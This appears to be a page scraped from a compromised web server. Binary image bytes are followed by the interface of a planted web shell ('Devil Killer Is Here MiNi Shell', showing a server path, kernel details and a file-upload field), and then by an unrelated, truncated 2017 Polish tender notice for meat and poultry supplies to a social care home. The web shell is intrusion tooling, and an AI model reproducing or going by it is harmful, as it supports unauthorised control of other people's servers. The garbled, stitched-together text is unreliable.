JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170112/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170112/7282-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.bip.dps.strzelceop.pl' target='_blank'>http://www.bip.dps.strzelceop.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 7282 - 2017
              z dnia 2017-01-12 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Strzelce Opolskie: Sukcesywna dostawa mięsa i  wędlin  oraz  kurczaków  i  artykułów  drobiowych  dla  Domu  Pomocy  Społecznej  w  Strzelcach  Op.  z  filią  w  Szymiszowie  i  filią  w  Leśnicy  ul. Strażacka 8<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Dom Pomocy Społecznej w Strzelcach Opolskich z Filią w Szymiszowie i Filią w Leśnicy, krajowy numer identyfikacyjny
              31049100000, ul.
              ul. Strażacka 
              8,
              47100  
              Strzelce Opolskie, woj.
              opolskie, państwo
              Polska, tel.
              774 613 480, e-mail
              dps.strzelceopolskie@wp.pl, faks
              774 613 480.
              <br />
              Adres strony internetowej (URL): www.bip.dps.strzelceop.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.bip.dps.strzelceop.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.dps.strzelceop.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />oferty w formie papierowej w sposób opisany w SIWZ<br />
                Adres:
                <br />Dom Pomocy Społecznej w Strzelcach Op. z filią w Szymiszowie i filią w Leśnicy ul. Strażacka 8, 47-100 Strzelce Op. </div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Sukcesywna dostawa mięsa i  wędlin  oraz  kurczaków  i  artykułów  drobiowych  dla  Domu  Pomocy  Społecznej  w  Strzelcach  Op.  z  filią  w  Szymiszowie  i  filią  w  Leśnicy  ul. Strażacka 8<br /><b>Numer referencyjny: </b>DPS.88.ZP.09.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b><br />2<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest sukcesywna dostawa mięsa i wędlin oraz kurczaków
i artykułów  drobiowych dla  Domu  Pomocy  Społecznej w  Strzelcach  Op. z  filią  
w Szymiszowie i  filią  w  Leśnicy  ul. Strażacka 8   w  ilościach:                                                                                                                                                                                                                 
Część  I  załącznik  nr  2: mięso  i  wędliny w  ilościach:
Baleron  gotowany  450kg,  boczek  wędzony  surowy  550kg,  flaki  wołowe  krojone  -  400kg,  frankfurterki  75kg,  mięso  wieprzowe gulaszowe pokrojone w kostkę  1600kg,  karczek bez kości  -1400kg,  kaszanka  luzem -350kg,  kiełbasa  śląska  1400kg, kiełbasa biała  20kg, kiełbasa kminkowa -300kg,  kości  wieprzowe (karczkowe lub schabowe) 1000kg,  kości  wołowe  200kg, kiełbasa krakowska wieprzowa  parzona 630kg,  łopatka bez kości  800kg,  metka (cebulowa, paprykowa)  200kg,  kiełbasa mielonka - 300kg, mięso  mielone  (wołowo-wieprzowe)  - 400kg,  mortadela wieprzowa  250kg,  parówka  cieńka  - 800kg,  parówka  gruba -  750kg,  pasztetowa  folia  180kg,  pieczeń  rzymska, cebulowa, paprykowa  160kg, kiełbasa gruba piwna  wieprzowa  150kg, polędwica  drobiowa  - 200kg,  polędwica  z  indyka  - 200kg,  polędwica sopocka  180kg, salceson  biały  w  folii  360kg, schab  bez  kości  - 480kg,  słonina  świeża  zmielona  -  220kg,  szynka  gotowana  -  500kg,  szynka  wieprzowa  mięso b/kości  - 330kg,  kiełbasa  szynkowa  wieprzowa  700kg,  wołowe  na  rolady  - 180kg, kiełbasa  zwyczajna  - 180kg,  żeberka  wieprzowe  1200kg.
  
Część  II - załącznik  nr  3 : kurczaki  i  artykuły drobiowe  w ilościach:  :  filet z kury bez skóry  świeży  pojedyńczy  500kg,  kurczak  cały  świeży  - 2700kg,  porcje rosołowe  świeże  - 150kg,  udko z  drobiu świeże  (noga z kurczaka bez kości grzbietowej) - 2200kg, udziec  z  indyka  bez  kości  bez  skóry  -  350kg,  wątróbka  drobiowa  świeża 460kg.    

Zamawiający  dopuszcza  składanie  ofert  częściowych,   obejmujących  jedną  lub dwie  części  zadania.
Wykonawca może  złożyć  ofertę  na  całość  jak  również  na  jedną  z  w/w  części  zamówienia.
Zamówienie  składa  się  z  dwóch  części :
I  część  - zadanie  pod  nazwą:  Sukcesywna  dostawa  mięsa i wędlin dla  Domu  Pomocy  Społecznej  w  Strzelcach  Op. z  filią  w  Szymiszowie  i  filią  w Leśnicy  
ul. Strażacka 8.
II część  - zadanie  pod  nazwą:  Sukcesywna  dostawa kurczaków  i artykułów  drobiowych  dla Domu Pomocy Społecznej w Strzelcach Op. z filią  w  Szymiszowie  i  filią  w   Leśnicy  ul. Strażacka  8.

1.Realizacja zamówienia dla  części  I  załącznik  nr  2  będzie  następować  zgodnie  
z  zasadami:
1.1. Wykonawca  zobowiązuje  się  dostarczyć  asortyment  dwa  razy  w  tygodniu  własnym  transportem  i  na  swój  koszt do  DPS  Filia  Szymiszów  ul. Strzelecka  2.   Pojazdy  do  przewozu  żywności  muszą  spełniać  wymagania  określone  w  Rozporządzeniu  Ministra  Zdrowia  z  dnia  19.12.2002r. (Dz. U. 21/2003 poz. 179) w sprawie  wymagań  sanitarnych  dotyczących  środków  transportu  żywności  w  ilościach  podanych  w  załączniku  nr  2,
1.2.asortyment  zamawianej  dostawy  będzie  uzgadniany sukcesywnie telefonicznie  lub  droga  elektroniczną  co najmniej  na  dwa  dni  przed  dostawą,
1.3.dostawy  na  niedzielę  lub  święto  powinny  następować  w  dniu  poprzedzającym
niedzielę  lub święto,
1.4. przedstawiciel  zamawiającego  jest  obecny  przy  odbiorze  przedmiotu  zamówienia  
lub  inna  osoba  go  zastępująca   ( liczenie, ważenie towaru  i  sprawdzenie  uszkodzeń 
i  terminów  gwarancji  itp.),
1.5.dostarczone  mięso  powinno  być  świeże,  nie  mrożone  i nie  pakowane  próżniowo,    
z terminem  przydatności  do  5  dni  od  dnia  dostawy, 
1.6.dostarczane  sukcesywnie  wędliny  powinny  być  nie  mrożone, pakowane  próżniowo 
i  mieć  aktualną  w  dniu  dostawy  co  najmniej  5  dniową  gwarancję  do  spożycia 
(data  przydatności  do  spożycia),
1.7. wykonawca  gwarantuje  spełnić  wymagane  normy  jakościowe  oraz  dostarczyć asortyment  w  stanie  świeżym  i  w  początkowym  okresie  gwarancji,  odpowiednio oznakowany, produkowany  i  dostarczany  asortyment powinien  być  zgodnie  zachowaniem  wymogów  sanitarno-epidemiologicznych  i  sytemu  HACCP,
1.8.wykonawca  zapewnia  dobrą  jakość  asortymentu,
1.9.wykonawca  gwarantuje  niezmienną  cenę  przedmiotu  zamówienia  w  okresie
obowiązywania  umowy,
1.10.Zamawiający  zastrzega  sobie  możliwość  nie  zrealizowania  umowy  w  całości,
1.11. Zamawiający  zastrzega  sobie  prawo  możliwości  niewykorzystania  ilości  objętej
umową  oraz  możliwości  zmiany  wybranych  pozycji  w  ramach  niewykorzystanego
asortymentu  objętego  umową  i  wartością  umowy,  powiadamianie  o  zmianie  asortymentu  następować  będzie  telefonicznie  ( za  pisemnym  potwierdzeniem ),   DPS  złoży Wykonawcy  wykaz  asortymentu  oraz  ilość  tego  asortymentu,  która  będzie  objęta  zmniejszeniem  i  zwiększeniem  w  terminie  co  najmniej  dwóch  dni  przed  
planowanym  terminem   dostawy.       
1.12. fakturowanie  odbywać  się  będzie  w  częściach  po  każdorazowej  dostawie.
1.13. Zamawiający dopuszcza  zmianę warunków  realizacji  umowy  jedynie  w  zakresie     zmiany  ilości  dostaw  -  poprzez  ich  zmniejszenia,  bądź  zwiększenia poszczególnych              rodzajów  mięsa  i  wędlin  przy  uwzględnieniu   bieżących  potrzeb  zamawiającego:
a)w  przypadku  zwiększenia  ilości  asortymentu do 20% zamówienia,  zamawiający  złoży wykonawcy  wykaz  asortymentu,  oraz  ilość  tegoż  asortymentu,  która  będzie  objęta  zwiększeniem  zmiana  warunków  dochodzi do skutku  w  wypadku,  gdy  wykonawca  w  terminie  do  pięciu  dni  potwierdzi  dostawę  zwiększonej  ilości  asortymentu  po cenach  określonych  w  umowie.  
b)w przypadku  konieczności  zmniejszenia  ilości  asortymentu,  zamawiający  złoży  wykonawcy  wykaz  asortymentu  oraz  ilość  tego  asortymentu,  która  będzie  objęta  zmniejszeniem  w  terminie  co  najmniej  dwóch  dni  przed planowanym  terminem dostawy.     
 
2. Realizacja zamówienia dla  części  II  załącznik  nr  3  będzie  następować  zgodnie  
z  zasadami:
2.1. Wykonawca  zobowiązuje  się  dostarczyć  asortyment  dwa  razy  w  tygodniu  własnym  transportem  i  na  swój  koszt do  DPS  Filia  Szymiszów  ul. Strzelecka  2.   Pojazdy  do  przewozu  żywności  muszą  spełniać  wymagania  określone  w  Rozporządzeniu  Ministra  Zdrowia  z  dnia  19.12.2002r. (Dz. U. 21/2003 poz. 179) w sprawie  wymagań  sanitarnych  dotyczących  środków  transportu  żywności  w  ilościach  podanych  w  załączniku  nr  3,
2.2.asortyment  zamawianej  dostawy  będzie  uzgadniany sukcesywnie telefonicznie  lub  drogą  elektroniczną  co  najmniej  na  dwa  dni  przed  dostawą,
2.3.dostawy  na  niedzielę  lub  święto  powinny  następować  w  dniu  poprzedzającym
niedzielę  lub święto,
2.4. przedstawiciel  zamawiającego  jest  obecny  przy  odbiorze  przedmiotu  zamówienia  
 lub  inna  osoba  go  zastępująca   ( liczenie, ważenie towaru  i  sprawdzenie  uszkodzeń 
 i  terminów  gwarancji  itp.),
2.5. wykonawca  gwarantuje  spełnić  wymagane  normy  jakościowe  oraz  dostarczyć
asortyment  w  stanie  świeżym  i  w  początkowym  okresie  gwarancji,  odpowiednio
oznakowany,  produkowany  i  dostarczany  asortyment powinien  być  zgodnie  zachowaniem  wymogów  sanitarno-epidemiologicznych  i  sytemu  HACCP,
2.6.dostarczony towar  powinien  być  świeży,  nie  mrożony  i nie  pakowany  próżniowo,    
z terminem  przydatności  do  5  dni  od  dnia  dostawy, 
2.7.dostarczana  sukcesywnie  polędwica  powinna  być  nie  mrożona, pakowana  próżniowo 
 i  mieć  aktualną  w  dniu  dostawy  co  najmniej  5  dniową  gwarancję  do  spożycia 
 (data  przydatności  do  spożycia),
2.8.wykonawca  zapewnia  dobrą  jakość  asortymentu  obejmującą  min. braki  uszkodzeń,  
2.9.wykonawca  gwarantuje  niezmienną  cenę  przedmiotu  zamówienia  w  okresie
obowiązywania  umowy,
2.10.Zamawiający  zastrzega  sobie  możliwość  nie  zrealizowania  umowy  w  całości,
2.11.Zamawiający  zastrzega  sobie  prawo  możliwości  niewykorzystania  ilości  objętej
umową  oraz  możliwości  zmiany  wybranych  pozycji  w  ramach  niewykorzystanego
asortymentu  objętego  umową  i  wartością  umowy,  powiadamianie  o  zmianie  asortymentu  następować  będzie  telefonicznie  ( za  pisemnym  potwierdzeniem ), DPS  złoży Wykonawcy  wykaz  asortymentu  oraz  ilość  tego  asortymentu,  która  będzie  objęta  zmniejszeniem  i  zwiększeniem  w  terminie  co  najmniej  dwóch  dni  przed  
planowanym  terminem   dostawy.       
2.12.fakturowanie  odbywać  się  będzie  w  częściach  po  każdorazowej  dostawie.
2.13. Zamawiający dopuszcza  zmianę warunków  realizacji  umowy  jedynie  w  zakresie     zmiany  ilości  dostaw  -  poprzez  ich  zmniejszenia,  bądź  zwiększenia poszczególnych              rodzajów  artykułów drobiowych przy  uwzględnieniu   bieżących  potrzeb  zamawiającego:
a)w  przypadku  zwiększenia  ilości  asortymentu do 20% zamówienia,  zamawiający  złoży wykonawcy  wykaz  asortymentu,  oraz  ilość  tegoż  asortymentu,  która  będzie  objęta  zwiększeniem  zmiana  warunków  dochodzi do skutku  w  wypadku,  gdy  wykonawca  w  terminie  do  pięciu  dni  potwierdzi  dostawę  zwiększonej  ilości  asortymentu  po     cenach  określonych  w  umowie.  
b)w przypadku  konieczności  zmniejszenia  ilości  asortymentu,  zamawiający  złoży  wykonawcy  wykaz  asortymentu  oraz  ilość  tego  asortymentu,  która  będzie  objęta  zmniejszeniem  w  terminie  co  najmniej  dwóch  dni  przed planowanym  terminem dostawy.     

<br /><br /><b>II.5) Główny kod CPV: </b>15100000-9<br /><b> Dodatkowe kody CPV:</b>15110000-2,
                15131500-0,
                15131130-5,
                15113000-3,
                15131120-2,
                15131620-7,
                15131134-3,
                15131410-2,
                15131400-9,
                15112000-6,
                15112100-7,
                15112300-9<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia wymagań w tym zakresie.  Warunek  zostanie  spełniony  poprzez  złożenie  oświadczenia o spełnienie warunków udziału.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie stawia wymagań w tym zakresie.  Warunek  zostanie  spełniony  poprzez  złożenie  oświadczenia o spełnienie warunków udziału.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający nie stawia wymagań w tym zakresie.  Warunek  zostanie  spełniony  poprzez  złożenie  oświadczenia o spełnienie warunków udziału.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1.aktualny  odpis  z  właściwego  rejestru  lub  z  centralnej  ewidencji  i  informacji  o  działalności  gospodarczej,   jeżeli  odrębne  przepisy  wymagają  wpisu  do  rejestru  lub  ewidencji,   w  celu  wykazania  braku  podstaw  do  wykluczenia  na  podstawie  art.  24  ust.  5  pkt.  1  ustawy  -  załącznik  nr  5,
Jeżeli  wykonawca  ma  siedzibę  lub  miejsce  zamieszkania  poza  terytorium  Rzeczypospolitej  Polskiej,  zamiast  dokumentów  o  których  mowa  w  pkt. 7.4 SIWZ 
składa  dokument  lub  dokumenty  wystawione  w  kraju,  w  którym  ma  siedzibę  lub  miejsce  zamieszkania,  potwierdzające  odpowiednio,  że  nie  otwarto  jego  likwidacji  ani  nie  ogłoszono  upadłości.
2.zaświadczenie  właściwego  naczelnika  urzędu  skarbowego  potwierdzającego,  że  wykonawca  nie  zalega  z  opłacaniem  podatków,  wystawionego  nie  wcześniej  niż  3  miesiące  przed  upływem  terminu  składania  ofert  załącznik  nr   6,
3. zaświadczenia  właściwej  terenowej  jednostki  organizacyjnej  Zakładu  Ubezpieczeń  Społecznych  lub  Kasy  Rolniczego  Ubezpieczenia  Społecznego  albo  innego  dokumentu  potwierdzającego,  że wykonawca  nie  zalega  z  opłacaniem  składek  na  ubezpieczenie  społeczne  lub  zdrowotne,  wystawionego  nie  wcześniej  niż  3  miesiące  przed  upływem  terminu  składania  ofert  załącznik  nr  7.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
